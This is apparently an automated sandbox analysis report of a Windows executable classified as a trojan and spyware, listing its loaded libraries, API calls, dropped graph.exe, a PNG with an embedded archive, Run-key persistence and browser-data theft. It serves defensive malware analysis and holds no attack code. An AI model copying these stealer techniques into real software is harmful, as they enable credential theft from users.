Source: C:\Users\user\Desktop\file.exe	Code function: String function: 00007FF7ABC260E0 appears 31 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 00007FF7ABC392E0 appears 33 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 00007FF7ABC1F4A0 appears 112 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 00007FF7ABC244A0 appears 127 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 00007FF7ABC208C0 appears 31 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 00007FF7ABC38F10 appears 31 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 00007FF7ABC21B10 appears 35 times

Source: file.exe	Binary or memory string: OriginalFilename vs file.exe
Source: file.exe, 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamewusvc4 vs file.exe
Source: file.exe, 00000002.00000000.1339083068.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamewusvc4 vs file.exe
Source: file.exe	Binary or memory string: OriginalFilenamewusvc4 vs file.exe

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\output[1].png, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_IMG_Embedded_Archive author = ditekSHen, description = Detects images embedding archives. Observed in TheRat RAT.
Source: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\output[1].png, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_IMG_Embedded_Archive author = ditekSHen, description = Detects images embedding archives. Observed in TheRat RAT.
Source: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_IMG_Embedded_Archive author = ditekSHen, description = Detects images embedding archives. Observed in TheRat RAT.

Source: classification engine

Classification label: mal80.troj.spyw.winEXE@8/9@4/4

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00007FF7ABC05D60 CreateToolhelp32Snapshot,Process32FirstW,OpenProcess,TerminateProcess,CloseHandle,Process32NextW,CloseHandle,Sleep,SleepEx,_invalid_parameter_noinfo_noreturn,

0_2_00007FF7ABC05D60

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00007FF7ABC07C50 __std_fs_code_page,__std_fs_code_page,__std_fs_code_page,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,CoInitialize,CoCreateInstance,CoUninitialize,CoUninitialize,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,

0_2_00007FF7ABC07C50

Source: C:\Users\user\Desktop\file.exe

File created: C:\Program Files\Google\Chrome\Extensions

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\output[1].png

Jump to behavior

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe

ReversingLabs: Detection: 63%

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: unknown	Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Program Files\Windows Media Player\graph\graph.exe "C:\Program Files\Windows Media Player\graph\graph.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Program Files\Windows Media Player\graph\graph.exe "C:\Program Files\Windows Media Player\graph\graph.exe"
Source: unknown	Process created: C:\Program Files\Windows Media Player\graph\graph.exe "C:\Program Files\Windows Media Player\graph\graph.exe"
Source: unknown	Process created: C:\Program Files\Windows Media Player\graph\graph.exe "C:\Program Files\Windows Media Player\graph\graph.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Program Files\Windows Media Player\graph\graph.exe "C:\Program Files\Windows Media Player\graph\graph.exe"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Program Files\Windows Media Player\graph\graph.exe "C:\Program Files\Windows Media Player\graph\graph.exe"	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Section loaded: kernel.appcore.dll	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Directory created: C:\Program Files\Google\Chrome\Extensions	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory created: C:\Program Files\Windows Media Player\graph	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory created: C:\Program Files\Windows Media Player\graph\graph.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip	Jump to behavior

Source: file.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: file.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: D:\exe\final\final\graph\x64\Release\graph.pdb% source: file.exe, 00000000.00000003.1441801975.000002321A614000.00000004.00000020.00020000.00000000.sdmp, graph.exe, 00000004.00000002.2586789149.00007FF6A2319000.00000002.00000001.01000000.00000007.sdmp, graph.exe, 00000004.00000000.1442015402.00007FF6A2319000.00000002.00000001.01000000.00000007.sdmp, graph.exe, 00000005.00000002.2586599577.00007FF6A2319000.00000002.00000001.01000000.00000007.sdmp, graph.exe, 00000005.00000000.1465637036.00007FF6A2319000.00000002.00000001.01000000.00000007.sdmp, graph.exe, 00000007.00000002.2586631310.00007FF6A2319000.00000002.00000001.01000000.00000007.sdmp, graph.exe, 00000007.00000000.1562238988.00007FF6A2319000.00000002.00000001.01000000.00000007.sdmp, graph.exe, 00000008.00000000.1642942576.00007FF6A2319000.00000002.00000001.01000000.00000007.sdmp, graph.exe, 00000008.00000002.2586573272.00007FF6A2319000.00000002.00000001.01000000.00000007.sdmp, graph.exe.0.dr
Source:	Binary string: D:\exe\final\merged_final\x64\Release\fetcher2.pdb source: file.exe
Source:	Binary string: D:\exe\final\merged_final\x64\Release\fetcher2.pdb[ source: file.exe
Source:	Binary string: D:\exe\final\final\graph\x64\Release\graph.pdb source: file.exe, 00000000.00000003.1441801975.000002321A614000.00000004.00000020.00020000.00000000.sdmp, graph.exe, 00000004.00000002.2586789149.00007FF6A2319000.00000002.00000001.01000000.00000007.sdmp, graph.exe, 00000004.00000000.1442015402.00007FF6A2319000.00000002.00000001.01000000.00000007.sdmp, graph.exe, 00000005.00000002.2586599577.00007FF6A2319000.00000002.00000001.01000000.00000007.sdmp, graph.exe, 00000005.00000000.1465637036.00007FF6A2319000.00000002.00000001.01000000.00000007.sdmp, graph.exe, 00000007.00000002.2586631310.00007FF6A2319000.00000002.00000001.01000000.00000007.sdmp, graph.exe, 00000007.00000000.1562238988.00007FF6A2319000.00000002.00000001.01000000.00000007.sdmp, graph.exe, 00000008.00000000.1642942576.00007FF6A2319000.00000002.00000001.01000000.00000007.sdmp, graph.exe, 00000008.00000002.2586573272.00007FF6A2319000.00000002.00000001.01000000.00000007.sdmp, graph.exe.0.dr

Source: file.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: file.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: file.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: file.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: file.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Persistence and Installation Behavior

Creates files in the system32 config directory

Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\output[1].png	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\json[1].json	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\sendMessage[1].json	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File created: C:\Program Files\Windows Media Player\graph\graph.exe

Jump to dropped file

Source: C:\Users\user\Desktop\file.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Graph	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Graph	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry value created or modified: HKEY_USERS.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run Graph	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry value created or modified: HKEY_USERS.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run Graph	Jump to behavior

Source: C:\Program Files\Windows Media Player\graph\graph.exe	Window / User API: threadDelayed 5920	Jump to behavior
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Window / User API: threadDelayed 1038	Jump to behavior
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Window / User API: threadDelayed 813	Jump to behavior
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Window / User API: threadDelayed 402	Jump to behavior
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Window / User API: threadDelayed 4634	Jump to behavior
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Window / User API: threadDelayed 3152	Jump to behavior

Source: C:\Program Files\Windows Media Player\graph\graph.exe

API coverage: 3.8 %

Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 7748	Thread sleep count: 5920 > 30	Jump to behavior
Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 7748	Thread sleep time: -5920000s >= -30000s	Jump to behavior
Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 7748	Thread sleep count: 1038 > 30	Jump to behavior
Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 7748	Thread sleep time: -1038000s >= -30000s	Jump to behavior
Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 7884	Thread sleep count: 813 > 30	Jump to behavior
Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 7884	Thread sleep time: -813000s >= -30000s	Jump to behavior
Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 7884	Thread sleep count: 402 > 30	Jump to behavior
Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 7884	Thread sleep time: -402000s >= -30000s	Jump to behavior
Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 8144	Thread sleep count: 4634 > 30	Jump to behavior
Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 8144	Thread sleep time: -4634000s >= -30000s	Jump to behavior
Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 8188	Thread sleep count: 3152 > 30	Jump to behavior
Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 8188	Thread sleep time: -3152000s >= -30000s	Jump to behavior

Source: C:\Program Files\Windows Media Player\graph\graph.exe	Last function: Thread delayed
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF7ABC09B00 GetEnvironmentVariableW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,Concurrency::cancel_current_task,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,	0_2_00007FF7ABC09B00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF7ABC3E440 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,CloseHandle,CloseHandle,	0_2_00007FF7ABC3E440
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF7ABC3E3CC FindClose,FindFirstFileExW,GetLastError,	0_2_00007FF7ABC3E3CC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF7ABC6070C FindFirstFileExW,	0_2_00007FF7ABC6070C
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Code function: 4_2_00007FF6A22FCD08 FindClose,FindFirstFileExW,GetLastError,	4_2_00007FF6A22FCD08
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Code function: 4_2_00007FF6A230FA54 FindFirstFileExW,	4_2_00007FF6A230FA54
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Code function: 4_2_00007FF6A22FCD7C GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,CloseHandle,CloseHandle,	4_2_00007FF6A22FCD7C

Source: file.exe, 00000000.00000003.1463728013.0000023218955000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1490397342.0000023218955000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1441377935.0000023218959000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000002.1503968722.0000012D102E2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1464989617.0000012D10373000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000002.1503968722.0000012D10374000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.1490397342.00000232188D5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW`
Source: file.exe, 00000000.00000003.1463728013.0000023218955000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1490397342.0000023218955000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1441377935.0000023218959000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWd

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00007FF7ABC4CA44 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00007FF7ABC4CA44

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00007FF7ABC42348 GetLastError,IsDebuggerPresent,OutputDebugStringW,

0_2_00007FF7ABC42348

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00007FF7ABC61EF8 GetProcessHeap,

0_2_00007FF7ABC61EF8

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF7ABC4CA44 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00007FF7ABC4CA44
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF7ABC438CC SetUnhandledExceptionFilter,	0_2_00007FF7ABC438CC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF7ABC42798 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00007FF7ABC42798
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF7ABC436EC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00007FF7ABC436EC
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Code function: 4_2_00007FF6A22FE3EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	4_2_00007FF6A22FE3EC
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Code function: 4_2_00007FF6A22FE8B0 SetUnhandledExceptionFilter,	4_2_00007FF6A22FE8B0
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Code function: 4_2_00007FF6A230364C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_00007FF6A230364C
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Code function: 4_2_00007FF6A22FE6D0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_00007FF6A22FE6D0

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00007FF7ABC68D10 cpuid

0_2_00007FF7ABC68D10

Source: C:\Users\user\Desktop\file.exe	Code function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,	0_2_00007FF7ABC63D04
Source: C:\Users\user\Desktop\file.exe	Code function: EnumSystemLocalesW,	0_2_00007FF7ABC64060
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoEx,FormatMessageA,	0_2_00007FF7ABC3DF9C
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoW,	0_2_00007FF7ABC58D4C
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoW,	0_2_00007FF7ABC64410
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_00007FF7ABC641C8
Source: C:\Users\user\Desktop\file.exe	Code function: EnumSystemLocalesW,	0_2_00007FF7ABC64130
Source: C:\Users\user\Desktop\file.exe	Code function: EnumSystemLocalesW,	0_2_00007FF7ABC58874
Source: C:\Users\user\Desktop\file.exe	Code function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_00007FF7ABC6474C
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoW,	0_2_00007FF7ABC64618
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_00007FF7ABC64568
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Code function: EnumSystemLocalesW,	4_2_00007FF6A2313370
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	4_2_00007FF6A2313408
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Code function: EnumSystemLocalesW,	4_2_00007FF6A230A4A8
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Code function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	4_2_00007FF6A231398C
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Code function: EnumSystemLocalesW,	4_2_00007FF6A23132A0
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Code function: GetLocaleInfoEx,FormatMessageA,	4_2_00007FF6A22FAF50
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	4_2_00007FF6A23137A8
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Code function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,	4_2_00007FF6A2312F44
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Code function: GetLocaleInfoW,	4_2_00007FF6A230A83C
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Code function: GetLocaleInfoW,	4_2_00007FF6A2313858
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Code function: GetLocaleInfoW,	4_2_00007FF6A2313650

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00007FF7ABC43938 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00007FF7ABC43938

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00007FF7ABC5D2C8 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,

0_2_00007FF7ABC5D2C8

Stealing of Sensitive Information

Tries to harvest and steal browser information (history, passwords, etc)

